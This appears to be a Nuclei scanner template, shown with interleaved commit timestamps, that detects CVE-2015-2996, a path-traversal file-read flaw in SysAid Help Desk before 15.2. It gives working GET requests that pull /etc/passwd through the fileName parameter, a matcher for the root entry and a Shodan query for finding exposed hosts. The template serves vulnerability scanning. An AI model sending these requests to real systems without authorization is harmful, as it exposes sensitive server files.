2022-09-27 21:42:24 +00:00
id : CVE-2015-2996
2023-02-07 04:30:16 +00:00
2022-09-27 21:42:24 +00:00
info :
2023-02-22 18:53:47 +00:00
name : SysAid Help Desk <15.2 - Local File Inclusion
2022-09-27 21:42:24 +00:00
author : 0x_Akoko
severity : high
2023-02-07 04:29:53 +00:00
description : |
2023-02-22 18:56:39 +00:00
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
2022-09-27 21:42:24 +00:00
reference :
- https://seclists.org/fulldisclosure/2015/Jun/8
2023-02-07 06:27:25 +00:00
- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
- http://seclists.org/fulldisclosure/2015/Jun/8
2023-02-21 22:01:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-09-27 21:42:24 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
cvss-score : 8.5
2022-09-27 21:42:24 +00:00
cve-id : CVE-2015-2996
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.77754
2024-03-23 09:28:19 +00:00
epss-percentile : 0.98153
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
2023-02-07 04:29:53 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : sysaid
product : sysaid
2023-09-06 13:22:34 +00:00
shodan-query : http.favicon.hash:1540720428
2024-01-14 09:21:50 +00:00
tags : cve2015,cve,sysaid,lfi,seclists
2022-09-27 21:42:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-27 21:42:24 +00:00
- method : GET
path :
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
2023-02-07 04:29:53 +00:00
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
2022-09-27 21:42:24 +00:00
2023-02-07 04:29:53 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2022-09-27 21:42:24 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950